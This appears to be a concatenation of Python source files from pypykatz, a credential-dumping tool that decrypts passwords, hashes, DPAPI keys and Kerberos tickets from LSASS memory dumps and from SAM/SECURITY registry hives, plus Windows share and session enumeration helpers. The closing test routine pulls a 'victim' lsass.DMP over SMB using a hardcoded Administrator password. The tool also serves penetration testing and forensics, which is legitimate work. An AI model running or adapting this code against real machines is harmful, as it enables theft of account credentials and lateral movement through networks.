			return r
		raise Exception('NetSessionEnum exception! %s' % r)
		
	_NetShareEnum = windll.Netapi32.NetShareEnum
	_NetShareEnum.argtypes = [LMSTR, DWORD, PVOID, DWORD, LPDWORD ,LPDWORD , LPDWORD]
	_NetShareEnum.restype  = DWORD
	_NetShareEnum.errcheck  = errc
	
	buf = PVOID()
	entriesread = DWORD()
	totalentries = DWORD()
	resume_handle = DWORD(0)
	
	if servername:
		servername = LPWSTR(servername)
	
	if level == 0:
		si_type = SHARE_INFO_0
	elif level == 1:
		si_type = SHARE_INFO_1
	elif level == 2:
		si_type = SHARE_INFO_2
	elif level == 502:
		si_type = SHARE_INFO_502
	elif level == 503:
		si_type = SHARE_INFO_503
	
	else:
		raise Exception('NetShareEnum unsupported level %s' % level)
		
	first_call = True
	shareinfos = []
	entries_read_total = 0
	while resume_handle.value != 0 or first_call:
		res = _NetShareEnum(servername, level, byref(buf), MAX_PREFERRED_LENGTH, byref(entriesread), byref(totalentries), byref(resume_handle))
		first_call = False
		entries_read_total += entriesread.value
		if entriesread.value > 0:
			map = ctypes.cast(buf, POINTER(si_type*entriesread.value))
			for i in range(entriesread.value):
				shareinfos.append(ShareInfo.from_struct(map.contents[i], level))
			NetApiBufferFree(buf)
			
		if entries_read_total == totalentries.value:
			break
	
	return shareinfos
	
def NetFileEnum(servername = None, basepath = None, username = None, level = 3):
	"""
	Only members of the Administrators or Account Operators local group can successfully execute 
	"""
	def errc(result, func, arguments):
		r = NetSessionEnumRes(result)
		if r == NetSessionEnumRes.NERR_SUCCESS or r == NetSessionEnumRes.ERROR_MORE_DATA:
			return r
		raise Exception('NetFileEnum exception! %s' % r)
		
	_NetFileEnum = windll.Netapi32.NetFileEnum
	_NetFileEnum.argtypes = [LMSTR,LMSTR,LMSTR, DWORD, PVOID, DWORD, LPDWORD ,LPDWORD , LPDWORD]
	_NetFileEnum.restype  = DWORD
	_NetFileEnum.errcheck  = errc
	
	buf = PVOID()
	entriesread = DWORD()
	totalentries = DWORD()
	resume_handle = DWORD(0)
	
	if servername:
		servername = LPWSTR(servername)
	if basepath:
		basepath = LPWSTR(basepath)
	if username:
		username = LPWSTR(username)
	
	if level == 2:
		si_type = FILE_INFO_2
	elif level == 3:
		si_type = FILE_INFO_3
	
	else:
		raise Exception('NetFileEnum unsupported level %s' % level)
		
	first_call = True
	shareinfos = []
	entries_read_total = 0
	while resume_handle.value != 0 or first_call:
		res = _NetFileEnum(servername, basepath, username, level, byref(buf), MAX_PREFERRED_LENGTH, byref(entriesread), byref(totalentries), byref(resume_handle))
		first_call = False
		entries_read_total += entriesread.value
		if entriesread.value > 0:
			map = ctypes.cast(buf, POINTER(si_type*entriesread.value))
			for i in range(entriesread.value):
				shareinfos.append(ShareInfo.from_struct(map.contents[i], level))
			NetApiBufferFree(buf)
			
		if entries_read_total == totalentries.value:
			break
	
	return shareinfos


#from builtins import str
__author__ = ("Tamas Jos <info@skelsec.com>")

from pypykatz.pypykatz import pypykatz
from pypykatz.commons.readers.rekall.rekallreader import RekallReader
from pypykatz.commons.common import *
import json
import ntpath
import os

from rekall.plugins.windows import common


class Pypykatz(common.WindowsCommandPlugin):
	"""Extract and decrypt passwords from the LSA Security Service."""
	"""
	IMPORTANT: Using the default viewer on rekall will NOT show you all the info!!!
	Recommendation: Use the out_file and kerberos_dir flags to get all the juicy stuff
	"""

	__name = "pypykatz"

	__args = [
		dict(name="override_timestamp", type="int", required=False,
			 help="The msv dll file timestamp detection fails in some cases."),

		dict(name="out_file", required=False,
			 help="The file name to write."),

		dict(name="kerberos_dir", required=False,
			 help="The file name to write."),

		dict(name="json", required=False, type="bool",
			 help="Write credentials to file in JSON format"),

	]

	table_header = [
		dict(name='LUID', width=6),
		dict(name='Type', width=8),
		dict(name='Sess', width=2),
		dict(name='SID', width=20),
		dict(name='Module', width=7),
		dict(name='Info', width=7),
		dict(name='Domain', width=16),
		dict(name='User', width=16),
		dict(name='SType', width=9),
		dict(name='Secret', width=80)
	]

	def __init__(self, *args, **kwargs):
		super(Pypykatz, self).__init__(*args, **kwargs)

	def collect(self):
		cc = self.session.plugins.cc()
		mimi = pypykatz.go_rekall(self.session, self.plugin_args.override_timestamp)

		if self.plugin_args.out_file and self.plugin_args.json:
			self.session.logging.info('Dumping results to file in JSON format')
			with open(self.plugin_args.out_file, 'w') as f:
				json.dump(mimi, f, cls = UniversalEncoder, indent=4, sort_keys=True)
		
	
		elif self.plugin_args.out_file:
			self.session.logging.info('Dumping results to file')
			with open(self.plugin_args.out_file, 'w') as f:
				f.write('FILE: ======== MEMORY =======\n')
					
				for luid in mimi.logon_sessions:
					f.write('\n'+str(mimi.logon_sessions[luid]))
					
					if len(mimi.orphaned_creds) > 0:
						f.write('\n== Orphaned credentials ==\n')
						for cred in mimi.orphaned_creds:
							f.write(str(cred))
		
		else:
			self.session.logging.info('Dumping results')
			for luid in mimi.logon_sessions:
				for row in mimi.logon_sessions[luid].to_row():
					yield row


		if self.plugin_args.kerberos_dir:
			directory = os.path.abspath(self.plugin_args.kerberos_dir)
			self.session.logging.info('Writing kerberos tickets to %s' % directory)
			base_filename = ntpath.basename('rekall_memory')
			ccache_filename = '%s_%s.ccache' % (base_filename, os.urandom(4).hex()) #to avoid collisions
			mimi.kerberos_ccache.to_file(os.path.join(directory, ccache_filename))
			for luid in mimi.logon_sessions:
				for kcred in mimi.logon_sessions[luid].kerberos_creds:
					for ticket in kcred.tickets:
						ticket.to_kirbi(directory)
								
			for cred in mimi.orphaned_creds:
				if cred.credtype == 'kerberos':
					for ticket in cred.tickets:
						ticket.to_kirbi(directory)
		return


#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#
import platform
from pypykatz import logger
import winreg

from pypykatz.commons.winapi.local.localwindowsapi import LocalWindowsAPI
from pypykatz.commons.winapi.constants import *
from pypykatz.commons.readers.registry.live.reader import LiveRegistryHive
from pypykatz.commons.winapi.local.function_defs.advapi32 import SC_MANAGER_ENUMERATE_SERVICE

class User:
	def __init__(self, name, domain, sid):
		self.username = name
		self.domain = domain
		self.sid = sid
		
	def __str__(self):
		return '%s:%s:%s' % (str(self.domain), str(self.username), str(self.sid))

class LiveMachine:
	"""
	
	"""
	def __init__(self, api = None):
		self.api = api if api is not None else LocalWindowsAPI()
		self.domain = None
		self.hostname = None
		
	def get_hostname(self):
		if self.hostname is None:
			params = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\Tcpip\Parameters')
			self.hostname = winreg.QueryValueEx(params, 'NV Hostname')[0]
		return self.hostname
		
	def get_domain(self):
		if self.domain is None:
			params = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\Tcpip\Parameters')
			self.domain = winreg.QueryValueEx(params, 'Domain')[0]
		return self.domain
		
	def get_current_user(self):
		pid = self.api.kernel32.GetCurrentProcessId()
		proc_handle = self.api.kernel32.OpenProcess(PROCESS_QUERY_INFORMATION, False, pid)
		token_handle = self.api.advapi32.OpenProcessToken(proc_handle, TOKEN_MANIP_ACCESS)
		ptr_sid = self.api.advapi32.GetTokenInformation_sid(token_handle)
		sid_str = self.api.advapi32.ConvertSidToStringSid(ptr_sid)
		name, domain, token_type = self.api.advapi32.LookupAccountSid(None, ptr_sid)
		return User(name, domain, sid_str)
		
	def list_users(self):
		logger.debug('Listing SIDs from registry...')
		software_hive = LiveRegistryHive('SOFTWARE')
		users = {}
		for sid_str in software_hive.enum_key('Microsoft\\Windows NT\\CurrentVersion\\ProfileList'):
			if sid_str.endswith('_Classes') or sid_str.startswith('.'):
				continue
			ptr_sid = self.api.advapi32.ConvertStringSidToSid(sid_str.encode())
			name, domain, token_type = self.api.advapi32.LookupAccountSid(None, ptr_sid)
			users[sid_str] = User(name, domain, sid_str)
		return users
	
	#def list_services(self):
	#	logger.debug('Listing services...')
	#	hsrvmgr = self.api.advapi32.OpenSCManager(dwDesiredAccess = SC_MANAGER_ENUMERATE_SERVICE)
	#	for serviceattr in self.api.advapi32.EnumServicesStatus(hsrvmgr):
	#		print(serviceattr.lpServiceName)
	#		print(serviceattr.lpDisplayName)
	#		print(serviceattr.ServiceStatus.dwServiceType)
	#		
	#
	#		status = ''
	#		if serviceattr.ServiceStatus.dwCurrentState == SERVICE_CONTINUE_PENDING:
	#			status = 'PENDING'
	#		elif serviceattr.ServiceStatus.dwCurrentState == SERVICE_PAUSE_PENDING:
	#			status = 'PENDINGPAUSE'
	#		elif serviceattr.ServiceStatus.dwCurrentState == SERVICE_PAUSED:
	#			status = 'PAUSED'
	#		elif serviceattr.ServiceStatus.dwCurrentState == SERVICE_RUNNING:
	#			status = 'RUNNING'
	#		elif serviceattr.ServiceStatus.dwCurrentState == SERVICE_START_PENDING:
	#			status = 'PENDINGSTART'
	#		elif serviceattr.ServiceStatus.dwCurrentState == SERVICE_STOP_PENDING:
	#			status = 'PENDINGSTOP'
	#		elif serviceattr.ServiceStatus.dwCurrentState == SERVICE_STOPPED:
	#			status = 'STOPPED'
	#
	#		print(status)

	def list_services_pid(self):
		logger.debug('Listing services with pid...')
		hsrvmgr = self.api.advapi32.OpenSCManager(dwDesiredAccess = SC_MANAGER_ENUMERATE_SERVICE)
		for serviceattr in self.api.advapi32.EnumServicesStatusEx(hsrvmgr):
			if serviceattr.ServiceStatusProcess.dwProcessId == 0:
				continue
			yield serviceattr.ServiceStatusProcess.dwProcessId
	
	def list_services(self):
		logger.debug('Listing services with pid...')
		hsrvmgr = self.api.advapi32.OpenSCManager(dwDesiredAccess = SC_MANAGER_ENUMERATE_SERVICE)
		for serviceattr in self.api.advapi32.EnumServicesStatusEx(hsrvmgr):
			if serviceattr.ServiceStatusProcess.dwProcessId == 0:
				continue
			yield serviceattr.lpServiceName, serviceattr.lpDisplayName, serviceattr.ServiceStatusProcess.dwProcessId
	
	def list_all_pids(self):
		for pid in self.api.psapi.EnumProcesses():
			if pid == 0:
				continue
			yield pid
			
if __name__ == '__main__':
	u = LiveMachine()
	t = u.list_services()
	
	#for srv in t:
	#	print(str(t[sid]))
	#t = u.get_current_user()
	#print(str(t))


#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#

import io
import enum


class DPAPI_SYSTEM:
	def __init__(self):
		self.version = None
		self.machine_key = None
		self.user_key = None
	
	@staticmethod
	def from_bytes(data):
		return DPAPI_SYSTEM.from_buffer(io.BytesIO(data))

	@staticmethod
	def from_buffer(buff):
		sk = DPAPI_SYSTEM()
		sk.version = int.from_bytes(buff.read(4), 'little', signed = False) 
		sk.machine_key = buff.read(20)
		sk.user_key = buff.read(20)
		return sk
		
	def __str__(self):
		t = '== DPAPI_SYSTEM ==\r\n'
		for k in self.__dict__:
			if isinstance(self.__dict__[k], list):
				for i, item in enumerate(self.__dict__[k]):
					t += '   %s: %s: %s' % (k, i, str(item))
			else:
				t += '%s: %s \r\n' % (k, str(self.__dict__[k]))
		return t


#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#

import json
from aiowinreg.ahive import AIOWinRegHive

from pypykatz.registry import logger
from pypykatz.commons.common import UniversalEncoder
from pypykatz.registry.sam.asam import *
from pypykatz.registry.security.asecurity import *
from pypykatz.registry.system.asystem import *
from pypykatz.registry.software.asoftware import *


class OffineRegistry:
	"""
	This class represents an offline registry
	You will need to set at least the SYSTEM hive (to get bootkey)
	In case you have the SAM and/or SECURITY hives, it will parse them for the stored credentials/secrets as well.
	"""
	def __init__(self):		
		self.sam_hive = None
		self.security_hive = None
		self.system_hive = None
		self.software_hive = None
		
		self.system = None
		self.sam = None
		self.security = None
		self.software = None
		
	async def get_secrets(self):
		self.system = SYSTEM(self.system_hive)
		bootkey = await self.system.get_bootkey()
		
		if self.sam_hive:
			self.sam = SAM(self.sam_hive, bootkey)
			await self.sam.get_secrets()
			
		if self.security_hive:
			self.security = SECURITY(self.security_hive, bootkey, self.system)
			await self.security.get_secrets()
			
		if self.software_hive:
			self.software = SOFTWARE(self.software_hive, bootkey)
			await self.software.get_default_logon()
		
	def to_file(self, file_path, json_format = False):
		with open(file_path, 'a', newline = '') as f:
			if json_format == False:
				f.write(str(self))
			else:
				f.write(self.to_json())
	
	def to_json(self):
		return json.dumps(self.to_dict(), cls = UniversalEncoder, indent=4, sort_keys=True)
			
	def to_dict(self):
		t = {}
		t['SYSTEM'] = self.system.to_dict()
		if self.sam:
			t['SAM'] = self.sam.to_dict()
		if self.security:
			t['SECURITY'] = self.security.to_dict()
		if self.software:
			t['SOFTWARE'] = self.software.to_dict()
		return t
		
		
	def __str__(self):
		t = str(self.system)
		if self.sam:
			t += str(self.sam)
		if self.security:
			t += str(self.security)
		if self.software:
			t += str(self.software)
		return t

	@staticmethod
	async def from_async_reader(system_reader, sam_reader = None, security_reader = None, software_reader = None):
		po = OffineRegistry()
		po.system_hive = AIOWinRegHive(system_reader)
		await po.system_hive.setup()
		
		if sam_reader is not None:
			po.sam_hive = AIOWinRegHive(sam_reader)
			await po.sam_hive.setup()
		
		if security_reader is not None:
			po.security_hive = AIOWinRegHive(security_reader)
			await po.security_hive.setup()
		
		if software_reader is not None:
			po.software_hive = AIOWinRegHive(software_reader)
			await po.software_hive.setup()
		
		await po.get_secrets()

		return po

	
	
if __name__ == '__main__':
	po = OffineRegistry.from_live_system()
	print(str(po))


#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#

import platform
import json
import asyncio
import base64
import traceback

from pypykatz.commons.common import KatzSystemInfo
from pypykatz.alsadecryptor import CredmanTemplate, MsvTemplate, \
	MsvDecryptor, WdigestTemplate, LsaTemplate, WdigestDecryptor, \
	LiveSspTemplate, LiveSspDecryptor, SspDecryptor, SspTemplate, \
	TspkgDecryptor, TspkgTemplate, \
	DpapiTemplate, DpapiDecryptor, LsaDecryptor,CloudapTemplate,\
	CloudapDecryptor, KerberosTemplate, KerberosDecryptor
from pypykatz.alsadecryptor.packages.msv.decryptor import LogonSession
from pypykatz import logger
from pypykatz.commons.common import UniversalEncoder
from minidump.aminidumpfile import AMinidumpFile
from minikerberos.common.ccache import CCACHE
from minikerberos.common.kirbi import Kirbi
from pypykatz._version import __version__

class apypykatz:
	def __init__(self, reader, sysinfo):
		self.reader = reader
		self.sysinfo = sysinfo
		self.credentials = []
		self.architecture = None
		self.operating_system = None
		self.buildnumber = None
		self.lsa_decryptor = None
		
		self.logon_sessions = {}
		self.orphaned_creds = []
		self.errors = []
		self.kerberos_ccache = CCACHE()
		
	def to_dict(self):
		t = {}
		t['logon_sessions'] = {}
		for ls in self.logon_sessions:
			# print(ls)
			t['logon_sessions'][ls] = (self.logon_sessions[ls].to_dict())
		t['orphaned_creds'] = []
		for oc in self.orphaned_creds:
			t['orphaned_creds'].append(oc.to_dict())
		
		t['errors'] = []
		for pkg, err in self.errors:
			err_str = str(err) +'\r\n' + '\r\n'.join(traceback.format_tb(err.__traceback__))
			err_str = base64.b64encode(err_str.encode()).decode()
			t['errors'].append((pkg,err_str))
		return t
		
	def to_json(self):
		return json.dumps(self.to_dict(), cls = UniversalEncoder, indent=4, sort_keys=True)

	def to_grep(self):
		res = ':'.join(LogonSession.grep_header) + '\r\n'
		for luid in self.logon_sessions:
			for row in self.logon_sessions[luid].to_grep_rows():
				res += ':'.join(row) + '\r\n'
				for cred in self.orphaned_creds:
					t = cred.to_dict()
					if t['credtype'] != 'dpapi':
						if t['password'] is not None:
							x =  [str(t['credtype']), str(t['domainname']), str(t['username']), '', '', '', '', '', str(t['password'])]
							res += ':'.join(x) + '\r\n'
					else:
						t = cred.to_dict()
						x = [str(t['credtype']), '', '', '', '', '', str(t['masterkey']), str(t['sha1_masterkey']), str(t['key_guid']), '']
						res += ':'.join(x) + '\r\n'
				
		for pkg, err in self.errors:
			err_str = str(err) +'\r\n' + '\r\n'.join(traceback.format_tb(err.__traceback__))
			err_str = base64.b64encode(err_str.encode()).decode()
			x =  [pkg+'_exception_please_report', '', '', '', '', '', '', '', err_str]
			res += ':'.join(x) + '\r\n'

		return res

	def __str__(self):
		res = '== Logon credentials ==\r\n'
		for luid in self.logon_sessions:
			res += str(self.logon_sessions[luid]) + '\r\n'
			
		if len(self.orphaned_creds) > 0:
			res += '== Orphaned credentials ==\r\n'
			for cred in self.orphaned_creds:
				res += str(cred) + '\r\n'
		
		if len(self.errors) > 0:
			res += '== Errors ==\r\n'
			for pkg, err in self.errors:
				err_str = str(err) +'\r\n' + '\r\n'.join(traceback.format_tb(err.__traceback__))
				err_str = base64.b64encode(err_str.encode()).decode()
				res += '%s %s \r\n' % (pkg+'_exception_please_report',err_str) 
		
		return res
		
	@staticmethod
	async def parse_minidump_file(filename, packages = ['all'], chunksize=10*1024):
		try:
			minidump = await AMinidumpFile.parse(filename)
			reader = minidump.get_reader().get_buffered_reader(chunksize)
			sysinfo = KatzSystemInfo.from_minidump(minidump)
		except Exception as e:
			logger.exception('Minidump parsing error!')
			raise e
		try:
			mimi = apypykatz(reader, sysinfo)
			await mimi.start(packages)
		except Exception as e:
			#logger.info('Credentials parsing error!')
			mimi.log_basic_info()
			raise e
		return mimi

	@staticmethod
	async def parse_minidump_external(handle, packages = ['all'], chunksize=10*1024):
		"""
		Parses LSASS minidump file based on the file object.
		File object can really be any object as longs as 
		it implements read, seek, tell functions with the 
		same parameters as a file object would.

		handle: file like object
		"""
		minidump = await AMinidumpFile.parse_external(handle)
		reader = minidump.get_reader().get_buffered_reader(chunksize)
		sysinfo = KatzSystemInfo.from_minidump(minidump)
		mimi = apypykatz(reader, sysinfo)
		await mimi.start(packages)
		return mimi

		
	def log_basic_info(self):
		"""
		In case of error, please attach this to the issues page
		"""
		logger.info('===== BASIC INFO. SUBMIT THIS IF THERE IS AN ISSUE =====')
		logger.info('pypyKatz version: %s' % __version__)
		logger.info('CPU arch: %s' % self.sysinfo.architecture.name)
		logger.info('OS: %s' % self.sysinfo.operating_system)
		logger.info('BuildNumber: %s' % self.sysinfo.buildnumber)
		logger.info('MajorVersion: %s ' % self.sysinfo.major_version)
		logger.info('MSV timestamp: %s' % self.sysinfo.msv_dll_timestamp)
		logger.info('===== BASIC INFO END =====')
		
	async def get_logoncreds(self):
		credman_template = CredmanTemplate.get_template(self.sysinfo)
		msv_template = MsvTemplate.get_template(self.sysinfo)
		logoncred_decryptor = MsvDecryptor(self.reader, msv_template, self.lsa_decryptor, credman_template, self.sysinfo)
		await logoncred_decryptor.start()
		self.logon_sessions = logoncred_decryptor.logon_sessions

	async def get_lsa_bruteforce(self):
		#good luck!
		logger.debug('Testing all available templates! Expect warnings!')
		for lsa_dec_template in LsaTemplate.get_template_brute(self.sysinfo):
			try:
				lsa_dec = LsaDecryptor.choose(self.reader, lsa_dec_template, self.sysinfo)
				await lsa_dec.acquire_crypto_material()
				lsa_dec.dump()
			except:
				pass
			else:
				logger.debug('Lucky you! Brutefoce method found a -probably- working template!')
				return lsa_dec
	
	async def get_lsa(self):
		#trying with automatic template detection
		try:
			lsa_dec_template = LsaTemplate.get_template(self.sysinfo)
			lsa_dec = LsaDecryptor.choose(self.reader, lsa_dec_template, self.sysinfo)
			await lsa_dec.acquire_crypto_material()
			lsa_dec.dump()
		except Exception as e:
			logger.debug('Failed to automatically detect correct LSA template! Reason: %s' % str(e))
			lsa_dec = await self.get_lsa_bruteforce()
			if lsa_dec is None:
				raise Exception('All detection methods failed.')
			return lsa_dec
		else:
			return lsa_dec
	
	async def get_wdigest(self):
		decryptor_template = WdigestTemplate.get_template(self.sysinfo)
		decryptor = WdigestDecryptor(self.reader, decryptor_template, self.lsa_decryptor, self.sysinfo)
		await decryptor.start()
		for cred in decryptor.credentials:
			if cred.luid in self.logon_sessions:
				self.logon_sessions[cred.luid].wdigest_creds.append(cred)
			else:
				self.orphaned_creds.append(cred)
	
	async def get_tspkg(self):
		tspkg_dec_template = TspkgTemplate.get_template(self.sysinfo)
		tspkg_dec = TspkgDecryptor(self.reader, tspkg_dec_template, self.lsa_decryptor, self.sysinfo)
		await tspkg_dec.start()
		for cred in tspkg_dec.credentials:
			if cred.luid in self.logon_sessions:
				self.logon_sessions[cred.luid].tspkg_creds.append(cred)
			else:
				self.orphaned_creds.append(cred)
				
	async def get_ssp(self):
		dec_template = SspTemplate.get_template(self.sysinfo)
		dec = SspDecryptor(self.reader, dec_template, self.lsa_decryptor, self.sysinfo)
		await dec.start()
		for cred in dec.credentials:
			if cred.luid in self.logon_sessions:
				self.logon_sessions[cred.luid].ssp_creds.append(cred)
			else:
				self.orphaned_creds.append(cred)
				
	async def get_livessp(self):
		livessp_dec_template = LiveSspTemplate.get_template(self.sysinfo)
		livessp_dec = LiveSspDecryptor(self.reader, livessp_dec_template, self.lsa_decryptor, self.sysinfo)
		await livessp_dec.start()
		for cred in livessp_dec.credentials:
			if cred.luid in self.logon_sessions:
				self.logon_sessions[cred.luid].livessp_creds.append(cred)
			else:
				self.orphaned_creds.append(cred)
				
	async def get_dpapi(self):
		dec_template = DpapiTemplate.get_template(self.sysinfo)
		dec = DpapiDecryptor(self.reader, dec_template, self.lsa_decryptor, self.sysinfo)
		await dec.start()
		for cred in dec.credentials:
			if cred.luid in self.logon_sessions:
				self.logon_sessions[cred.luid].dpapi_creds.append(cred)
			else:
				self.orphaned_creds.append(cred)
	
	async def get_kerberos(self, with_tickets = True):
		dec_template = KerberosTemplate.get_template(self.sysinfo)
		dec = KerberosDecryptor(self.reader, dec_template, self.lsa_decryptor, self.sysinfo)
		await dec.start()
		for cred in dec.credentials:
			for ticket in cred.tickets:
				for fn in ticket.kirbi_data:
					self.kerberos_ccache.add_kirbi(Kirbi(ticket.kirbi_data[fn]))
			
			if cred.luid in self.logon_sessions:
				self.logon_sessions[cred.luid].kerberos_creds.append(cred)
			else:
				self.orphaned_creds.append(cred)
	
	async def get_cloudap(self):
		cloudap_dec_template = CloudapTemplate.get_template(self.sysinfo)
		if cloudap_dec_template is None:
			return
		cloudap_dec = CloudapDecryptor(self.reader, cloudap_dec_template, self.lsa_decryptor, self.sysinfo)
		await cloudap_dec.start()
		for cred in cloudap_dec.credentials:
			if cred.luid in self.logon_sessions:
				self.logon_sessions[cred.luid].cloudap_creds.append(cred)
			else:
				self.orphaned_creds.append(cred)

	async def start(self, packages = ['all']):
		#self.log_basic_info()
		#input()
		self.lsa_decryptor = await self.get_lsa()
		if 'msv' in packages or 'all' in packages:
			try:
				await self.get_logoncreds()
			except Exception as e:
				self.errors.append(('msv', e))

		if 'wdigest' in packages or 'all' in packages:
			try:
				await self.get_wdigest()
			except Exception as e:
				self.errors.append(('wdigest', e))
		
		if 'kerberos' in packages or 'ktickets' in packages or 'all' in packages:
			with_tickets = False
			if 'ktickets' in packages or 'all' in packages:
				with_tickets = True
			await self.get_kerberos(with_tickets)
		
		if 'tspkg' in packages or 'all' in packages:
			try:
				await self.get_tspkg()
			except Exception as e:
				self.errors.append(('tspkg', e))
		
		if 'ssp' in packages or 'all' in packages:
			try:
				await self.get_ssp()
			except Exception as e:
				self.errors.append(('ssp', e))
		
		if 'livessp' in packages or 'all' in packages:
			try:
				await self.get_livessp()
			except Exception as e:
				self.errors.append(('livessp', e))
		
		if 'dpapi' in packages or 'all' in packages:
			try:
				await self.get_dpapi()
			except Exception as e:
				self.errors.append(('dpapi', e))
		
		if 'cloudap' in packages or 'all' in packages:
			try:
				await self.get_cloudap()
			except Exception as e:
				self.errors.append(('cloudap', e))

async def amain():
	from aiosmb.commons.connection.factory import SMBConnectionFactory
	from pypykatz.alsadecryptor.asbmfile import SMBFileReader

	import sys
	f=sys.argv[1]
	print(f)

	url = 'smb2+ntlm-password://TEST\\Administrator:QLFbT8zkiFGlJuf0B3Qq@10.10.10.102/C$/Users/victim/Desktop/lsass.DMP'
	smburl = SMBConnectionFactory.from_url(url)
	connection = smburl.get_connection()
	smbfile = smburl.get_file()

	async with connection:
		_, err = await connection.login()
		if err is not None:
			raise err
		
		_, err = await smbfile.open(connection)
		if err is not None:
			raise err

		mimi = await apypykatz.parse_minidump_external(SMBFileReader(smbfile))
		print(mimi)

def main():
	import logging
	logging.basicConfig(level=1)
	asyncio.run(amain())

if __name__ == '__main__':
	main()